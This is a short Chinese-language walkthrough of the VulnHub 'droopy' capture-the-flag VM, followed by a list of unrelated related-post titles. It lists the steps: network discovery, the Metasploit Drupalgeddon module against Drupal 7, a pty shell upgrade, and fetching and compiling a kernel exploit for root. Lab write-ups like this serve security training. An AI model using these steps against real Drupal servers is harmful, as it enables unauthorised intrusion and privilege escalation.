droopyCTF

https://www.vulnhub.com/?q=droopy&sort=date-des&type=vm

CTF镜像合集:https://www.vulnhub.com/?page=18

参考:https://www.hackingarticles.in/hack-droopy-vm-ctf-challenge/

1.获取目标ip地址,并进行端口发现,目标只开启了80端口

netdiscover -i eth0 -r 192.168.88.1/24

访问web页面

Drupal 7 应该是一个类似于wordpress的一个开源的框架

searchsploit Drupal 7 搜索相关漏洞

使用 msf 利用 漏洞

use exploit/multi/http/drupal_drupageddon

set rhosts 192.168.88.200

exploit

利用注入漏洞上传payload 获得shell

搜索内核相关漏洞信息

使用 pty 获取完整性shell

python -c ‘import pty; pty.spawn(“/bin/bash”)’

开启web,使用 wget 将 漏洞利用代码下载到目标机器

编译.c文件,执行漏洞利用程序,成功获得root权限。

DROOPYCTF WALKTHROUGH相关推荐

  1. A Complete Machine Learning Walk-Through in Python

    A Complete Machine Learning Project Walk-Through in Python: Part One A Complete Machine Learning Pro ...

  2. OPEN(SAP) UI5 学习入门系列之四:更好的入门系列-官方Walkthrough

    好久没有更新了,实在不知道应该写一些什么内容,因为作为入门系列,实际上应该更多的是操作而不是理论,而在UI5 SDK中的EXPLORER里面有着各种控件的用法,所以在这里也没有必要再来一遍,还是看官方 ...

  3. exif viewer java,1earn/XSS挑战-WalkThrough.md at master · dizhaung/1earn · GitHub

    XSS挑战-WalkThrough 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 知识点 无过滤 XSS (level 1) 各种难度 ...

  4. Walkthrough: Word 2007 XML 格式

    本页内容 简介 Word 2007 文档包 Word XML格式的开放打包约定 解析Word 2007文件 确定Word 2007文档中的非XML部件 从文档中分离内容 理解数据存储 结论 简介 Mi ...

  5. hackmyvm-bunny walkthrough

    hackmyvm-buny walkthrough 难度(作者评价):difficult 信息收集 PORT STATE SERVICE 22/tcp open ssh 80/tcp open htt ...

  6. [Hack The Box] HTB—Paper walkthrough

    [Hack The Box] HTB-Paper walkthrough HTB-Paper [Hack The Box] HTB-Paper walkthrough 一.信息搜集 X-Backend ...

  7. HTB walkthrough -- Admirer

    HTB walkthrough – Admirer 0x01 信息收集 使用nmap扫描端口开放情况 dirb搜索到robots.txt 访问robots.txt,页面中提到一个文件夹/admin-d ...

  8. hackmyvm: kitty walkthrough

    hackmyvm: kitty walkthrough 0x01 oracle padding 端口扫描: PORT STATE SERVICE 22/tcp open ssh 80/tcp open ...

  9. Hackthebox:Silo Walkthrough(not use metasploit)

    预备知识 Oracle 数据库渗透:oracle默认端口.odat使用--sid.用户名密码爆破.任意文件上传 JuicyPotato提权 netcat.certutil.nmap 信息收集和获取立足 ...

  10. iBlog Config WalkThrough ! iBlog 完全配置指南 !

    怀旧系列. 最近在GitHub中发现了2017年写的一个博客网站项目(目前已经删除),经过一番修改,终于能跑起来了(目的是做最后的截图留念),长这个样子的: 左边有我的各个社交媒体的主页,虽然都不怎么 ...

最新文章

  1. OpenCV中SiftDescriptorExtractor
  2. Mac OS使用技巧之十二:解决APP Store更新、下载出错的问题
  3. jax-ws cxf_走向REST:在Spring和JAX-RS(Apache CXF)中嵌入Jetty
  4. 文件下载时,文件名乱码问题
  5. 网络压缩《网络压缩论文整理》
  6. stm32编码器正反转计数程序_第六章:STM32CubeMx 定时器编码器模式基本使用方法...
  7. Android ProgressDialog示例
  8. SQL中FOR XML子句的各种用法,包括FOR XML字句的四种基本模式:AUTO模式、RAW模式、PATH模式和EXPLICIT模式...
  9. Android Architecture Components 系列(五)Room
  10. 身份证前6位地区编码sql
  11. 使用jsoup爬虫超时分析与处理
  12. ASCALL码表对照表 最全、最成体系表格 与对比
  13. Arduino - 连接RS232串口设备(通过RS232转TTL转接口)
  14. linux下oracle登陆建表,Oracle建表过程初学
  15. 软件自动化测试的学习路线
  16. eclipse保存文件出现save could not be completed. Try File Save As..
  17. 啦啦啦啦啦啦啦啦啦啦啦啦
  18. 如何设置计算机网络ip地址,图文解说如何设置IP地址
  19. 面试,这些问题一定要问清楚!
  20. 递归查询Sdcarad文件中的音乐,图片类同

热门文章

  1. canvas :五角星的代码实现
  2. 想改行,学什么技术能看到未来?
  3. 163邮箱服务器注册不了怎么办,outlook邮箱添加163邮箱账户失败该怎么办?
  4. 163电子邮箱怎么注册申请?手机号注册电子邮箱的小技巧
  5. Written English-书面-现在完成进行时
  6. android音乐16bit,16bit音乐是无损吗
  7. MetaMask账号注册
  8. mysql 分区表max_mysql 分区
  9. 1005打印任务取消不了 hp_(完整版)hp打印机无法取消打印的文档解决方法
  10. 分享一个好用的抠图网站